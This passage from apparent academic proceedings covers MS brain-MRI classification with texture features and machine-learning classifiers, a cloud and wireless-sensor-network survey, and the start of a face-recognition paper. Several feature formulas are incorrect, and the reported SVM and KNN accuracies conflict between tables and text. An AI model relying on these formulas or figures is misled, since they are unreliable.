Cluster shade (CS) = $\sum_{i,j} \{i+j-\mu_x-\mu_y\}^3\, x(i,j)$. It is the lack of symmetry in the image.
Difference entropy (DIFFENT) = $\sum_{i=0}^{N_g} x_{y+z}(i)\log\{x_{y+z}(i)\}$. It is the difference of the entropies of all the features.
Cluster prominence (CP) = $\sum_{i,j} \{i+j-\mu_y-\mu_z\}^4\, x(i,j)$. It is a measure of the skewness of the matrix.
Difference variance (DIFFV) = $\sum_{i=0}^{N_g} (i-\mathrm{SUMENT})^2\, x_{y+z}(i)$. It is the difference of the variances of all the features.
Maximum probability (MAXPROB) = $\max_{i,j} x(i,j)$. It shows the gray level value $x_i$ that appears adjacent to the gray level value $x_j$ most prominently in the image.
Autocorrelation (AUTOCORR) = $\sum_i \sum_j i \cdot j \cdot x(i,j)$. It is described as a closeness measure between the dataset and a shifted copy of the dataset.
Dissimilarity (DISS) = $\sum_i \sum_j |i-j| \cdot x(i,j)$. It is the variation of gray level pairs.

For each given input, the SVM determines whether the input belongs to a healthy brain MR image or to a non-healthy MS patient's brain MR image.
First, the feature vector of every training image is represented as a unique point
in a space, $x \in R^D$. After the feature vectors are represented in the feature space,
a decision boundary separating these points into their respective classes is
generated. The hyperplane dividing the points (for classification) is
$H: w^T x + b = 0$, where b is the bias term and w is the slope (normal) vector. The nonlinear
transformation of an input feature is $M(x): R^D \rightarrow R^M$, and the separating hyperplane in this
transformed space is $w^T M(x) + b = 0$. The distance of the hyperplane $w^T M(x) + b = 0$ from a given point vector $M(x_0)$
is given in Eq. (3):

$$d_H(M(x_0)) = \frac{w^T M(x_0) + b}{\|w\|_2} \quad (3)$$

The goal is to maximize the minimum distance, as given in Eq. (4):

$$w^* = \arg\max_{w} \min_{n} d_H(M(x_n)) \quad (4)$$

The product of a predicted and actual label is greater than zero on a correct prediction,
otherwise it is less than zero. The kernel function takes data as input and transforms
it into the desired form. Three kernel functions (radial basis function, linear and
polynomial) were utilized, and the best accuracy rate of 96.55% was found with the polynomial
kernel function.
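A sketch of this kernel comparison with scikit-learn's SVC is given below, reusing the placeholder split from the KNN sketch; gamma='scale' stands in for the heuristic kernel-scale selection, and the polynomial degree of 2 is an assumption, since the paper does not state the order used.

```python
from sklearn.svm import SVC
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler

# Compare the three kernels discussed above on the same feature split.
for kernel in ('linear', 'poly', 'rbf'):
    clf = make_pipeline(StandardScaler(),
                        SVC(kernel=kernel, degree=2, gamma='scale'))
    clf.fit(X_train, y_train)
    print(kernel, 'accuracy:', clf.score(X_test, y_test))
```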
Ensemble Learning. Ensemble learning is a technique that combines different
classifiers, each having some error rate, to obtain a resulting approach in which the error
rate is small. In this proposed work, the decision tree with four different boosting algorithms
and bagging (AdaBoostM1, LPBoost, LogitBoost, RUSBoost and Bagging)
has been implemented to do the binary classification task that separates the healthy
brain class from the unhealthy brain (multiple sclerosis) MR class. In the decision tree ensemble, a
large number of trees are built, each tree votes for a class, and the class which
receives the most votes by a simple majority is the predicted class. The labels 0 and
1 denote the normal and abnormal classes, respectively. The learning
algorithm is then run n times, and in every round a training weight is allocated to
each training sample. At the start of the algorithm, all the weights for each training
example are the same, and in the subsequent rounds, the weights of incorrectly
classified objects are increased so as to focus on the difficult objects in the training set.
Lastly, a strong classifier is constructed. The decision tree with AdaBoost and LogitBoost gives the highest
accuracy rate of 82.75%.
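The sketch below shows the boosting and bagging idea with scikit-learn (version ≥ 1.2 is assumed for the estimator parameter); only AdaBoost and bagging are illustrated, because LPBoost, LogitBoost and RUSBoost are MATLAB fitcensemble methods without direct scikit-learn equivalents. The placeholder split from the earlier sketches is reused.

```python
from sklearn.ensemble import AdaBoostClassifier, BaggingClassifier
from sklearn.tree import DecisionTreeClassifier

# n_estimators corresponds to the number of learning cycles discussed in Sect. 3.3.
ada = AdaBoostClassifier(estimator=DecisionTreeClassifier(max_depth=1),
                         n_estimators=300, random_state=0).fit(X_train, y_train)
bag = BaggingClassifier(estimator=DecisionTreeClassifier(),
                        n_estimators=300, random_state=0).fit(X_train, y_train)
print('AdaBoost accuracy:', ada.score(X_test, y_test))
print('Bagging accuracy :', bag.score(X_test, y_test))
```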

Unsupervised Machine Learning Techniques


K-mean clustering. K-mean clustering is an unsupervised approach which divides the observations
into k clusters. The algorithm consists of two stages. The first stage selects k
centers at random. The next stage assigns every feature set to the closest center.
The cityblock distance is used as the distance between each sample and the cluster centers, and it
gives the highest accuracy as compared to the cosine distance.
The cityblock distance is the summation of the absolute differences between two coordinate vectors.
The cityblock distance of two points m and n with p dimensions is mathematically
calculated using the formula mentioned in Eq. (5):

$$\text{dist}_{ij} = \sum_{i=1}^{p} |m_i - n_i| \quad (5)$$

When all the feature groups have been assigned to some cluster, the first pass
is completed, and the early grouping is refined by re-evaluating the averages of the
clusters formed in the first pass. This iterative process continues until the criterion function reaches a
minimum.
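A minimal sketch of this two-stage loop with the city-block distance is given below; empty-cluster handling and multiple restarts are omitted for brevity, and the stopping rule simply checks that the centers have stopped moving. Function and variable names are illustrative.

```python
import numpy as np
from scipy.spatial.distance import cdist

def kmeans_cityblock(X, k=2, n_iter=100, seed=0):
    """Plain k-means loop using the city-block (L1) distance for assignment."""
    rng = np.random.default_rng(seed)
    centers = X[rng.choice(len(X), size=k, replace=False)]           # stage 1: k random centers
    for _ in range(n_iter):
        labels = cdist(X, centers, metric='cityblock').argmin(axis=1)  # stage 2: nearest center
        new_centers = np.array([X[labels == c].mean(axis=0) for c in range(k)])
        if np.allclose(new_centers, centers):                         # centers settled: stop
            break
        centers = new_centers
    return labels, centers
```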
Gaussian Mixture Model. GMM is also an unsupervised algorithm for the classification
of healthy brain MR images from non-healthy MR images. It is a probabilistic
model that uses a soft clustering technique for spreading the feature points into
different clusters. For a set of data points, GMM identifies the likelihood of
each data point belonging to each of these distributions. Expectation-maximization
is the base of GMM. Let μ1, μ2 be the means and σ1, σ2 the covariance values of cluster
1 and cluster 2, respectively. The density (mixing proportion) of distribution i is ρi. These values are first
assigned randomly, and after that, to find the values of the parameters
defining the Gaussian distributions, the expectation-maximization steps are
performed.
E Step. For each data point xi, calculate the probability that it belongs to
cluster/distribution c1, c2. This is done using the formula in Eq. (6):

$$r_{ic} = \frac{\text{Probability that } x_i \text{ belongs to cluster } c}{\text{Sum of probabilities that } x_i \text{ belongs to } c_1 \text{ and } c_2} \quad (6)$$

The value will be high if the point is assigned to the right cluster; otherwise, it is low.
M Step. The values of μ, σ and ρ are updated using Eqs. (7)–(9) as mentioned below:

$$\rho = \frac{\text{No. of points assigned to the cluster}}{\text{Total number of points}} \quad (7)$$
The mean and the covariance matrix are updated based on the values assigned to
the distribution, in proportion to the probability values for each data point:

$$\mu = \frac{\sum_i r_{ic}\, x_i}{\text{No. of points assigned to the cluster}} \quad (8)$$

$$\sigma_c = \frac{\sum_i r_{ic}\,(x_i - \mu_c)(x_i - \mu_c)^T}{\text{No. of points assigned to the cluster}} \quad (9)$$
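The sketch below fits a two-component GMM by expectation-maximization with scikit-learn and scores it against the placeholder split used in the earlier sketches; because cluster labels are arbitrary, the better of the two possible label alignments is reported.

```python
import numpy as np
from sklearn.mixture import GaussianMixture

# Two-component GMM fitted by EM on the (placeholder) textural features.
gmm = GaussianMixture(n_components=2, covariance_type='full', random_state=0).fit(X_train)
pred = gmm.predict(X_test)

# Align arbitrary cluster labels with the ground truth before scoring.
acc = max(np.mean(pred == y_test), np.mean((1 - pred) == y_test))
print('GMM accuracy:', acc)
```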

3 Experimental Results

To examine the proposed system's performance, experiments have been done on
an e-health dataset and a private clinical dataset, consisting of 82 unhealthy brain
MRI images from the e-health dataset [11–15], i.e., images of persons suffering from multiple
sclerosis disease, and 110 healthy control brain MRI images from a private hospital
[16], for a total of 192 images.
Each image has a dimension of 512 × 512 with a resolution of 57 dpi.
The experiments are carried out in MATLAB R2020a. The proposed work was performed
on a computer having an Intel Core i5 processor, a 2.5 GHz CPU and 4 GB of RAM. 85% of the images,
chosen randomly from the dataset, have been used for training purposes, i.e., 94 healthy
images and 69 unhealthy images (Table 2).

3.1 Number of Neighbors and Distance Metric Selection in K-Nearest Neighbor Classification

In this section, accuracy is analyzed for different numbers of neighbors and two
different distance metrics (cosine and Euclidean). It has been observed that using the
Euclidean distance measure with one neighbor gives the highest accuracy
of 96.55% for the classification of healthy brain MR images from unhealthy brain
MR images, as illustrated in Table 3.

Table 2 Dataset used for experimental analysis

Training images (85%): 94 healthy, 69 unhealthy | Testing images (15%): 16 healthy, 13 unhealthy | Total: 192
Table 3 Highest accuracy achieved using KNN classifier

Classification model    Accuracy (%)
KNN_EUC_1               96.55
KNN_COS_1               93.1

Table 4 Highest accuracy achieved using SVM classifier

Classification model    Accuracy (%)
SVM_Auto_polynomial     96.55
SVM_0.0015_RBF          55.9
SVM_Auto_linear         93.1

3.2 Kernel Function Selection and Kernel Scale Selection in Support Vector Machine

In this section, accuracy is analyzed on different kernel scales and three kernel func-
tions (radial basis function, linear and polynomial). It has been analyzed from Table
4 that the heuristic approach of kernel scale selection gives the best results. The
polynomial kernel gives the highest accuracy (96.55%) as compared to radial basis
function (48.27%) and linear kernel function (93.1%) with a heuristic approach for
identification of the kernel scale as illustrated in Table 4.

3.3 Selection of Boosting Method and Learning Cycles in Decision Tree Classifier (Ensemble Learning)

In this section, accuracy is analyzed for different learning cycles with four different boosting
methods (AdaBoostM1, LogitBoost, LPBoost and RUSBoost) and the bagging method.
It has been observed that AdaBoost and LogitBoost give the highest accuracy
(82.75%) with 300 and 500 learning cycles, respectively (Table 5).

Table 5 Highest accuracy achieved using ensemble classifier

Classification model      Accuracy (%)
ENSMBL_LogitBoost_500     82.75
ENSMBL_LPBoost_100        75.86
ENSMBL_AdaBoost_300       82.75
Table 6 Performance of unsupervised techniques

Classification model      Accuracy (%)
K-mean clustering         75.86
Gaussian mixture model    72.41

Fig. 2 Accuracy of
K-nearest neighbor on
different distance measures

3.4 Unsupervised Learning Approach Using K-mean and Gaussian Mixture Model (GMM) Clustering

A comparison of the unsupervised approaches for MS classification using the k-mean and
Gaussian mixture model techniques is shown in Table 6.

3.5 Comparison of Proposed Technique with Earlier Studies

A comparison of different classifiers on different datasets is shown in Table 7. Our
proposed work achieves an accuracy of 96.55% with KNN and SVM as classifiers.
Fig. 3 Accuracy of SVM on different kernel scales. Here on the x-axis, 1—Auto, 2—0.0015, 3—0.0132, 4—0.098

Fig. 4 Accuracy of
ensemble on different
learning cycles

4 Conclusion

This paper presented a comparative performance analysis of the classification accuracy of
supervised and unsupervised machine learning approaches for multiple sclerosis
disease identification. The experiments are carried out on an e-health dataset and a private clinical dataset,
Table 7 Performance comparative analysis with earlier studies

State-of-the-art feature extraction technique for MSD identification | Classifier | Accuracy (%)
GLCM [1] | FFNN | 92.75
Haar wavelet + PCA [3] | Logistic regression | 89.72
Gray matter [18] | Random forest | 92
GLCoM [19] | Ensemble | 82.75
Gray level textural feature | KNN_COS_1 | 92.31
Gray level textural feature | KNN_EUC_1 | 96.3
Gray level textural feature | Ensemble | 75.86
Gray level textural feature | SVM_Linear_auto | 93.1
Gray level textural feature | SVM_RBF_0.013 | 55.17
Gray level textural feature | K-mean | 75.86
Gray level textural feature | GMM | 72.41
Proposed gray level textural features | Support vector machine | 96.55

consisting of 110 healthy control brain MRI images from the private clinical dataset and
82 unhealthy (multiple sclerosis) brain MRI images from the e-health dataset. Eighteen
textural features have been extracted after preprocessing of the brain magnetic reso-
nance images. It has been verified that the supervised learning approaches outperform the
unsupervised approaches. The K-nearest neighbor classifier and the polynomial kernel-
based support vector machine (SVM) give the highest accuracy of 96.55% as compared
to the unsupervised approaches. In future work, different feature extraction techniques
will be analyzed on different classification models, and a comparative study with
convolutional neural networks will also be carried out for the identification of multiple
sclerosis disease from brain magnetic resonance images.

References

1. Zhou, Q., & Shen, X. (2018). Multiple sclerosis identification by grey-level cooccurrence
matrix and biogeography-based optimization. In 2018 IEEE 23rd International Conference on
Digital Signal Processing (DSP), Shanghai, China (pp. 1–5). https://doi.org/10.1109/ICDSP.
2018.8631873
2. Nayak, D. R., Dash, R., & Majhi, B. (2016). Brain MR image classification using two-
dimensional discrete wavelet transform and AdaBoost with random forests. Neurocomputing,
177, 188–197. ISSN 0925-2312, https://doi.org/10.1016/j.neucom.2015.11.034
3. Wu, X., & Lopez, M. (2017). Multiple sclerosis slice identification by haar wavelet transform and
logistic regression. In Advances in Materials, Machinery, Electrical Engineering (AMMEE 2017).
Atlantis Press. https://doi.org/10.2991/ammee-17.2017.10
4. Wang, S.-H., Cheng, H., Phillips, P., & Zhang, Y.-D. (2018). Multiple sclerosis identification
based on fractional fourier entropy and a modified Jaya algorithm. Entropy, 20, 254. https://
doi.org/10.3390/e20040254
5. Wang, S., et al. (2016). Multiple sclerosis detection based on biorthogonal wavelet transform,
RBF kernel principal component analysis, and logistic regression. IEEE Access, 4, 7567–7576.
https://doi.org/10.1109/ACCESS.2016.2620996
6. Zhang, Y. -D., et al. (2018). Multiple sclerosis identification by convolutional neural network
with dropout and parametric ReLU. Journal of Computational Science, 28, 1–10. https://doi.
org/10.1016/j.jocs.2018.07.003
7. Zurita, M., Montalba, C., Labbé, T., Cruz, J. P., da Rocha, J. D., Tejos, C., Ciampi, E.,
Cárcamo, C., Sitaram, R., Uribe, S. (2018). Characterization of relapsing-remitting multiple
sclerosis patients using support vector machine classifications of functional and diffusion MRI
data. NeuroImage: Clinical, 20, 724–730. ISSN 2213-1582, https://doi.org/10.1016/j.nicl.2018.
09.002
8. Valcarcel, A. M. et al. (2020). TAPAS: A thresholding approach for probability map automatic
segmentation in multiple sclerosis. NeuroImage. Clinical 27, 102256. https://doi.org/10.1016/
j.nicl.2020.102256
9. Roy, S., et al. (2017). An effective method for computerized prediction and segmentation of
multiple sclerosis lesions in brain MRI. Computer Methods and Programs in Biomedicine, 140,
307–320. https://doi.org/10.1016/j.cmpb.2017.01.003
10. Shanmuganathan, M., et al. (2020). Review of advanced computational approaches on multiple
sclerosis segmentation and classification. IET Signal Processing, 14(6), 333–341. https://doi.
org/10.1049/iet-spr.2019.0543
11. e-health dataset. http://www.medinfo.cs.ucy.ac.cy/
12. Loizou, C. P., Murray, V., Pattichis, M. S., Seimenis, I., Pantziaris, M., & Pattichis, C. S.
(2011). Multi-scale amplitude modulation-frequency modulation (AM-FM) texture analysis
of multiple sclerosis in brain MRI images. IEEE Transactions on Information Technology in
Biomedicine, 15(1), 119–129.
13. Loizou, C. P., Kyriacou, E. C., Seimenis, I., Pantziaris, M., Petroudi, S., Karaolis, M., &
Pattichis, C. S. (2013). Brain white matter lesion classification in multiple sclerosis subjects
for the prognosis of future disability. Intelligent Decision Technologies Journal (IDT), 7, 3–10.
14. Loizou, C. P., Pantziaris, M., Pattichis, C. S., & Seimenis, I. (2013). Brain MRI image
normalization in texture analysis of multiple sclerosis. Journal of Biomedical Graphics and
Computing, 3(1), 20–34.
15. Loizou, C. P., Petroudi, S., Seimenis, I., Pantziaris, M., & Pattichis, C. S. (2015). Quantitative
texture analysis of brain white matter lesions derived from T2-weighted MR images
in MS patients with clinically isolated syndrome. Journal of Neuroradiology. Journal de
Neuroradiologie, 42(2), 99–114. https://doi.org/10.1016/j.neurad.2014.05.006
16. All the healthy brain magnetic resonance images are from the radiology department of Safdarjang
Hospital, New Delhi, and Subharti Medical College, Meerut.
17. Jyotsna, N. R., & Vishwakarma, V. P. (2016). Face recognition using Symlet, PCA and cosine
angle distance measure. In 2016 Ninth International Conference on Contemporary Computing
(IC3), Noida (pp. 1–7). https://doi.org/10.1109/IC3.2016.7880231.
18. Eshaghi, A., Wottschel, V., Cortese, R., Calabrese, M., Sahraian, M. A., Thompson, A. J.,
Alexander, D. C., & Ciccarelli, O. (2016). Gray matter MRI differentiates neuromyelitis optica
from multiple sclerosis using random forest. Neurology, 87(23), 2463–2470. https://doi.org/
10.1212/WNL.0000000000003395
19. Jain, S., Rajpal, N., & Yadav, J. (2020) Multiple sclerosis identification based on ensemble
machine learning technique (November 21, 2020). In Proceedings of the 2nd International
Conference on IoT, Social, Mobile, Analytics and Cloud in Computational Vision and Bio-
Engineering (ISMAC-CVB 2020). Available at SSRN https://ssrn.com/abstract=3734806 or
https://doi.org/10.2139/ssrn.3734806
Cloud Computing Overview of Wireless
Sensor Network (WSN)

Mahendra Prasad Nath, Sushree Bibhuprada B. Priyadarshini,


and Debahuti Mishra

Abstract Wireless sensor networks (WSNs) are spatially distributed systems outfitted
with an enormous number of nodes for monitoring and recording different environmental
conditions such as humidity, temperature and pressure. In this paper, we start by
introducing WSNs and cloud computing. Next, we discuss the overview, features and services
provided by cloud computing, followed by an overview of WSNs. We then discuss
application scenarios of cloud computing and WSNs, and finally conclude the paper.

Keywords Cloud computing · Distributed computing · Internet · Wireless sensor


network

1 Introduction

Communication between sensor nodes over the Internet is often a difficult problem,
yet it makes sense to integrate sensor networks with the Internet [1–12]. Simultaneously,
the information of a sensor network ought to be accessible at any time and through any
path [1]. Allocating addresses to an enormous number of sensor nodes is a
challenging problem, so a sensor node cannot establish a connection with the network
on its own. Distributed processing also helps corporate organizations run their core business
practices with less difficulty and greater productivity. A cloud-like environment allows
countless virtual servers and applications to be managed even more effectively [2].

Fig. 1 Overview of cloud computing and WSN platform
Figure 1 comprises WSNs (e.g., WSN1, WSN2 and WSN3), clients and the
cloud infrastructure. Clients request services from the framework. Each WSN
consists of physical wireless sensor nodes deployed to sense data for various applications,
such as transport surveillance, weather forecasting, military use and so on.
Every sensor node is programmed with the required application, and additionally
comprises operating-system and network-management components.
The application program identifies the data sensed on every sensor node
and sends it back to the cloud gateway via an access point or by multi-hop routing through various
nodes. The routing protocol plays a fundamental role in managing the
network topology and accommodating network dynamics. The cloud provides on-demand services
and storage resources to the clients. It gives access to these resources through the
web and proves useful when there is a sudden need for resources [3].
2 Overview of Cloud Computing

Cloud computing is a term used to describe both a platform and a type of
application. Cloud computing platforms dynamically provision, configure
and reconfigure servers as needed. Cloud servers
can be virtual machines or physical machines; this is an alternative to having local servers
handle applications. As a consequence, the end users of the cloud computing
system do not know where the servers actually are. Clouds
typically also include other computing resources, for instance storage
area networks, networking equipment, firewalls and other security devices
[4]. In addition, cloud computing describes applications that are extended to be
accessible over the web. Such cloud applications use large server farms and powerful
servers hosting web applications [5] and data services [6]. Anyone with a
suitable connection to the web and a standard browser can access a cloud application.

2.1 Features of Cloud Computing

The main features of cloud computing are as follows:

• The accumulation of resources: Resources are dynamically allocated from a shared pool
according to the customers' demand [7].
• Resource abstraction: Resources are hidden from customers. Customers can
simply use the resources without any knowledge of the location from which data will be
retrieved or where data will be stored [8].
• On-demand service: Customers' requests to avail resources can be
satisfied automatically without human interaction [9].
• Measuring services: Although computing resources are pooled and shared by
multiple clients (i.e., multi-tenancy), the cloud infrastructure [10] can measure each
individual consumer's use of resources through its metering feature.
• Demanding elasticity: There is no fixed understanding or agreement on the
time span for using the resources. Customers can use the resources whenever
they need them and can release them when they finish [11].
• Accessing the network: The customer application can run on different platforms with the
help of a mobile phone, PC or PDA using a secure Internet connection [12].

2.2 Services Provided by Cloud Computing

Four services offered by the cloud are as follows:

• Platform as a Service (PaaS): PaaS is an enhanced framework that supports the
entire business lifecycle and allows cloud customers to develop cloud
services and applications (for instance SaaS) directly on the PaaS cloud. The difference
between SaaS and PaaS is therefore that SaaS hosts only completed
cloud applications, while PaaS provides a development platform that hosts both completed cloud
applications and those in progress. This requires PaaS to provide a development
infrastructure including the programming environment, tools and configuration.
Google App Engine is one such example of PaaS [9].
• Infrastructure as a Service (IaaS): Cloud consumers directly use the IT infrastructure provided
in the IaaS cloud (processing, storage, networks and other core computing
resources). In the IaaS cloud, virtualization is used extensively to organize physical
resources dynamically to satisfy growing or shrinking demands for resources
from cloud consumers. The principal virtualization method is to set up separate virtual
machines (VMs), isolated from both the underlying hardware and other VMs.
This strategy differs from the multi-tenancy model, which
aims to transform the application software architecture so that
multiple instances (from different cloud consumers) can run on a single application.
One example of an IaaS is Amazon's EC2 [9].
• Software as a Service (SaaS): Cloud consumers release their applications in a
hosting environment that application users can access through
networks from different clients, for example a web browser or PDA [2],
and so on. Cloud users have no control over the underlying cloud infrastructure. SaaS commonly
uses a multi-tenant system architecture, in which the applications of different cloud clients
are consolidated in a single logical environment in the SaaS cloud to achieve
economies of scale and efficiency with respect to speed, security, availability,
disaster recovery and maintenance. SaaS examples include Google Mail, Google Docs, etc.
• Data as a Service (DaaS): DaaS can be viewed as a special category of IaaS.
DaaS allows consumers to pay for only what they actually use rather than a site license for the whole database.
In addition to standard storage interfaces, for instance RDBMS
and file systems, some DaaS implementations offer table-style abstractions that
are designed to scale out to store and retrieve huge amounts of data. Such
kinds of DaaS include Amazon S3, Google BigTable, Apache HBase [3],
etc.

2.3 Types of Cloud

The cloud can be classified into the following four types:

(A) Public Cloud: A public cloud, as illustrated in Fig. 2, is a cloud computing
deployment model that is open for public use. In this case, the general
public is described either as individual users or as corporations. The public
cloud infrastructure is owned by a cloud service vendor. Instances of the public cloud are Microsoft Windows Azure, Google App
Engine, Salesforce.com and Amazon Web Services [2, 4].

Fig. 2 Public cloud

(B) Private Cloud: A private cloud, as shown in Fig. 3, is a cloud computing
deployment model used by a single organization. Private cloud
computing frameworks are intended solely for use by the organization's employees.
It is also termed an internal cloud. Private clouds can deliver the benefits
of public cloud computing while at the same time permitting the enterprise
to keep greater control over its information and processes.

Fig. 3 Private cloud

(C) Community Cloud: A community cloud is a cloud deployment model
implemented for a community. It may be considered to exist somewhere
between a private cloud and a public cloud. The community cloud
describes a shared infrastructure that is used by and supported by numerous
organizations. This shared cloud resource may be used by groups that have
overlapping considerations, for example joint compliance requirements or
non-competitive business necessities [2].
(D) Hybrid Cloud: A hybrid cloud, as shown in Fig. 4, is any blend of the previous three
models of cloud deployment. NIST describes it as a structure containing at least two
clouds (private, community or public). The clouds are connected together by standardized
technologies, thereby permitting portability of data and applications [4].
Fig. 4 Hybrid cloud

3 Overview of Wireless Sensor Network

A WSN incorporates spatially distributed autonomous sensors to cooperatively monitor physical
or environmental conditions, for example temperature, vibration, pressure, motion or
pollution [1]. The development of wireless sensor networks was driven by defense
applications such as battlefield surveillance. They are currently used in a number of
industrial and civilian application areas, including industrial process
monitoring and control [3], machine health monitoring [2], environment and habitat
monitoring [5], healthcare applications, home automation [3] and
traffic control [1]. Each node in a sensor network is typically equipped with a
radio transceiver or other wireless device, a small microcontroller, and a battery
as its main energy source. The size of a sensor node may
vary from that of a shoebox down to a grain of dust.

3.1 Protocols for Routing in WSN

WSN routing protocols are generally divided into two classes: network-structure
based and protocol-operation based. Network-structure-based routing is
further divided into flat-based routing, hierarchical-based routing and
location-based routing. Protocol-operation-based routing is further divided into multipath-based,
query-based, QoS-based, coherent-based and negotiation-based routing
[3]. In location-based routing, the positions of the sensor nodes are exploited to route
data in the network. In this kind of routing, sensor nodes are addressed
by means of their locations. The distance between neighboring nodes can
be estimated on the basis of incoming signal strengths.
The relative coordinates of neighboring nodes can be obtained by exchanging
this information among neighbors [3]. Alternatively, the location of nodes may be obtained
directly by communicating with a satellite using GPS (Global Positioning System) [5].
Examples of location-based routing protocols are GAF, GEAR, GPSR,
MFR, DIR, GEDIR, GOAFR, SPAN [5] and so forth. In hierarchical-based
routing, nodes assume different roles in the network. Higher-level nodes
can be used to process and send the data, while low-level nodes can be
used to perform the sensing in the proximity of the target. This implies
the creation of clusters and the assignment of special tasks to cluster heads, which can greatly add
to the overall system scalability, lifetime and energy efficiency.
Hierarchical routing is an effective strategy to lower energy consumption
within a cluster. Hierarchical routing is commonly a two-layer scheme, where
one layer is used to select cluster heads and the other layer is used for
routing. Examples of hierarchical-based routing protocols are LEACH,
PEGASIS, TEEN, APTEEN, MECN, SMECN, SOP, Sensor Aggregate
routing, VGA, HPAR, TTDD and so forth [3].

4 Application Scenarios of Cloud Computing and WSN

Joining WSNs with the cloud simplifies the on-the-fly sharing and analysis of
real-time sensor data. It also makes it favorable to offer sensor data as a service over the web.
The terms "Software as a Service (SaaS)" [3] and "Sensor
Event as a Service (SEaaS)" [5] are coined to represent how sensor data
and events of interest, respectively, can be delivered to customers over the cloud infrastructure.
Merging the two technologies makes sense for a large number of use cases.
Some applications of sensor networks using cloud computing are as follows.

4.1 Health Care

Sensor networks are additionally utilized in the healthcare area. In some
advanced hospitals, sensor networks are deployed to monitor patient physiological data, to
control the drug administration, and to track patients and doctors
within the hospital. In this situation, the information gathered from the patients
is extremely sensitive and should be maintained appropriately, as the specialists
require the gathered information for subsequent diagnosis [2, 4].

4.2 Transport Surveillance

A transport monitoring framework incorporates fundamental management systems
like traffic signal control, navigation, automatic number plate recognition,
toll collection, emergency vehicle notification, dynamic traffic lights and so forth [1]. Sensors
are utilized to recognize vehicles and control traffic lights in a transport monitoring structure.
Video cameras have been used to monitor high-traffic road sections and to send
recordings to human operators at central locations. At busy road intersections,
sensors with an embedded networking capability can be deployed to detect and count
vehicle traffic and estimate its speed. Sensors need to communicate with neighboring nodes in order
to eventually build up a global traffic picture from which customers can generate
control signals [5].
4.3 Climate Anticipation

Weather forecasting is the application of predicting the atmospheric conditions for a future time
and a given location. A climate monitoring and forecasting framework normally
incorporates data collection, data assimilation, numerical weather prediction and
forecast presentation. To sense the relevant parameters, each weather station
is equipped with sensors, viz., wind speed/direction, relative humidity, temperature,
barometric pressure, precipitation, soil moisture, ambient light (visibility) and sky cover.
The data gathered from these sensors are huge in size
and strain the use of a conventional database. The assimilation process is carried out after
collecting the information. The complicated equations that describe how the
atmospheric situation changes over time (the weather forecast) require supercomputers
to solve them [3].

4.4 Military Usage

In the military, sensor networks are used for monitoring friendly forces [1], battlefield
surveillance [3], battle damage assessment, and nuclear, biological and chemical attack
detection, etc. [5]. The information gathered from such applications is of the highest
importance and has high-level security requirements that may not be satisfied,
for security reasons, by using typical web networks. Cloud computing may be
part of the answer to this problem by providing the military application with
a secure platform that is used for defense purposes only.

5 Conclusion

The sharing of information between sensor nodes via the Internet is a hectic chal-
lenge owing to limited bandwidth, memory and small battery sizes of sensor nodes.
A widely used cloud computing technique can overcome the storage capacity issues.
Some issues pertaining to cloud computing and sensor networking are discussed in
this paper. The specific application-oriented scenarios are important for the devel-
opment of a new protocol in the sensor network. Keeping this in mind, some cloud
computing application of the sensor networks has been discussed.

References

1. Wang, Y., Jin, Q., & Ma, J. (2013). Integration of rangebased and range-free localiza-
tion algorithms in wireless sensor networks for mobile clouds. In Green Computing and
Communications(Greencom.).
2. Priyadarshini, S. B. B., & Panigrahi, S. (2016). A distributed approach based on maximal


far-flung scalar premier selection for camera actuation. Lecture Notes in Computer Science,
87–91. https://doi.org/10.1007/978-3-319-28034-9_10.
3. Priyadarshini, S. B. B., Panigrahi, S., & Bagjadab, A. B. (2017). A distributed triangular scalar
cluster premier selection scheme for enhanced event coverage and redundant data minimization
in wireless multimedia sensor networks. Indian Journal of Scientific Research (IJSR), 14,
96–102.
4. Priyadarshini, S. B. B., & Panigrahi, S. (2017). A distributed scalar controller selection
scheme for redundant data elimination in sensor networks. International Journal of Knowledge
Discovery in Bioinformatics, 7, 91–104. https://doi.org/10.4018/IJKDB.2017010107
5. Nath, M. P., Sagnika, S., Das, M., & Pandey, M. (2017). Object recognition using cat swarm
optimization. International Journal of Research and Scientific Innovation (IJRSI), IV (VIIS),
47–51.
6. Nath, M. P., Goyal, K., Prasad, J., & Kallur, B. (2018). Chat Bot—An edge to customer insight.
International Journal of Research and Scientific Innovation (IJRSI), 5(5), 29–32.
7. Nath, M., Muralikrishnan, J., Sundarrajan, K., & Varadarajanna, M. (2018). Continuous
integration, delivery, and deployment: A revolutionary approach in software development.
International Journal of Research and Scientific Innovation (IJRSI), 5, 185–190.
8. Nath, M. P., Pandey, P., Somu, K., & Amalraj, P. (2018). Artificial intelligence and machine
learning: The emerging milestones in software development. International Journal of Research
and Scientific Innovation (IJRSI), 5, 36–44.
9. Nath, M. P., Sridharan, R., Bhargava, A., & Mohammed, T. (2019). Cloud computing: An
overview, benefits, issues and research challenges. International Journal of Research and
Scientific Innovation (IJRSI), 6, 25–35.
10. Nath, M. P., Sagnika, S. (2020). Capabilities of Chatbots and its performance enhancements
in machine learning machine learning and information processing. Advances in Intelligent
Systems and Computing, 1101, 183–192. https://doi.org/10.1007/978-981-15-1884-3_17.
11. Nath, M. P., Priyadarshini, S. B. B., Mishra, D., & Borah, S. (2020). A comprehensive study
of contemporary IoT technologies and varied machine learning (ML) schemes. In Proceeding
of the International Conference on Computing and Communication (IC3 2020) Sikkim, India,
13–14 July 2020 (pp. 623–634). Springer. https://doi.org/10.1007/978-981-15-7394-1_56.
12. Nath, M. P., Priyadarshini, S. B. B., & Mishra, D. (2020) A comprehensive study on security
in IoT and resolving security threats using machine learning (ML). In Proceeding of the 3rd
International Conference on Intelligent Computing and Advances in Communication (ICAC-
2020), Bhubanewar, India, 25–26 November 2020. Springer, In press.
An Enhanced Support Vector Machine
for Face Recognition in Fisher Subspace

Tanvi Jain and Jyotsna Yadav

Abstract With the advances in technology, facial recognition has become a very
popular technology, used chiefly as a security technique. Face recognition using the
support vector machine has been used for years, but it does not work well with imbalanced
data and its computational time is high. In this work, an enhanced support
vector machine (ESVM) is utilized for multi-classifying the face images. The Fisher subspace
method is utilized for feature extraction, as it is more efficient for datasets consisting
of multiple classes, with class separability as a vital attribute while compressing
dimensionality. It concentrates on the type of features from face image data that provide
a better demarcation for separating face images, and then ESVM-based multi-
classification is utilized for the classification purpose. The advantages of ESVM-based
multiclass classification for face images include flexibility and reduced computational
time. ESVM-based multiclass classification based on One-vs-One (OVO) and One-
vs-All (OVA) is utilized for performing experiments on two standard databases,
Yale and ORL. A number of experiments are also performed varying the sub-
dimensions in Fisher space with different kernels of the proposed ESVM on different
